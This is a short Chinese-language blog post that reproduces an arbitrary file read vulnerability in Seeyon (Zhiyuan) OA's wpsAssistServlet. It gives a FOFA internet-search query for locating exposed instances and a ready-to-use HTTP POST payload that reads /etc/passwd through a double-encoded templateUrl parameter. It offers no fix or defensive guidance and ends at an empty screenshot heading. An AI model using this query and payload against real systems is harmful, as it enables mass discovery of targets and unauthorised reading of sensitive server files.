Babing
Published on 2024-08-30 / 4 Visits
0
0

Z4-4致远互联-OA-任意文件读取

Z4-4致远互联-OA-任意文件读取

漏洞描述:

致远互联-OA wpsAssistServlet 存在任意文件读取漏洞,攻击者可读取系统密码等敏感信息进一步控制系统。

网站图片:

image.webp

网络测绘:

fofa语法:

body=“/seeyon/USER-DATA/IMAGES/LOGIN/login.gif” || title=“用友致远A” || (body=“/yyoa/” && body!=“本站内容均采集于”) || header=“path=/yyoa” || server==“SY8044” || (body=“A6-V5企业版” && body=“seeyon” && body=“seeyonProductId”) || (body=“/seeyon/common/” && body=“var _ctxpath = '/seeyon'“) || (body=“A8-V5企业版” && body=“/seeyon/“) || banner=“Server: SY8044”

漏洞复现:

payload:

POST /seeyon/wpsAssistServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

flag=template&templateUrl=%252Fetc%252Fpasswd

效果图:<br /


Comment